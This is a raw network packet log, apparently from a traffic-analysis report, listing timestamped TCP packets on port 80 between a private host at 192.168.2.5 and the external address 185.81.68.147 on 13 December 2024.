                                                                                                                                                                Dec 13, 2024 01:37:36.139425993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139442921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139523983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139558077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139579058 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139596939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139630079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139655113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139671087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139698029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139712095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139739990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139754057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139780998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139794111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139817953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139831066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139858007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139873028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.139902115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140103102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140135050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140151978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140177965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140192986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140260935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140285969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140300035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140326023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140373945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140396118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140415907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140477896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140502930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140516043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140539885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140553951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140578985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140594959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140611887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140780926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140813112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140826941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140850067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140863895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140883923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140898943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140919924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140949011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140963078 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.140985966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141000986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141022921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141041040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141056061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141148090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141161919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141184092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141200066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141261101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141274929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141302109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141349077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141376019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141391039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141415119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141428947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141485929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141504049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141519070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141540051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141554117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141577005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141593933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141613960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141774893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141798973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141819954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141834974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141858101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141874075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141899109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141912937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141933918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141948938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141963959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.141983032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142009020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142009020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142108917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142126083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142153025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142205954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142236948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142251968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142271996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142319918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142338037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142357111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142378092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142442942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142442942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142461061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142482996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142497063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142524004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142545938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142565012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142708063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142740965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142755032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142776966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142791033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142812967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142827988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142841101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142860889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142879009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142893076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142918110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142931938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142960072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.142973900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143071890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143085957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143107891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143121958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143182993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143196106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143218040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143284082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143284082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143300056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143327951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143383026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143405914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143419981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143443108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143459082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143479109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143493891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143512964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143662930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143693924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143707037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143728971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143742085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143769026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143788099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143810034 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143830061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143843889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143867016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143882036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.143903971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144001007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144026995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144042015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144100904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144124985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144139051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144188881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144217968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144232035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144254923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144301891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144328117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144339085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144364119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144378901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144398928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144413948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144433975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144448042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144592047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144608021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144632101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144644976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144670010 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144684076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144704103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144718885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144740105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144753933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144776106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144789934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144810915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144825935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144922018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144936085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.144963026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145031929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145031929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145051003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145073891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145123959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145148039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145163059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145189047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145204067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145251989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145266056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145298958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145313978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.145327091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148709059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148732901 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148755074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148772955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148797989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148811102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148835897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148850918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148875952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148886919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148911953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148925066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148947954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148962021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148984909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.148998976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149022102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149038076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149056911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149158001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149188995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149204016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149226904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149243116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149307966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149322033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149348021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149360895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149415970 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149446964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149461031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149482012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149494886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149553061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149586916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149604082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149625063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149640083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149668932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149682999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149703979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149823904 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.149832964 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.149856091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149883986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149897099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149916887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149930954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149951935 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149965048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.149988890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150005102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150032043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150044918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150065899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150067091 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150084019 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150084019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150098085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150114059 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150119066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150122881 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150134087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150154114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150157928 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150168896 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150182009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150197029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150204897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150296926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150326014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150345087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150422096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150422096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150433064 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150441885 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150446892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150463104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150464058 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150475979 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150487900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150490999 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150506973 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150517941 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150533915 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150542021 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150542021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150559902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150567055 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150574923 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150583982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150599957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150639057 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.150646925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.150648117 CET8049775185.81.68.147192.168.2.5
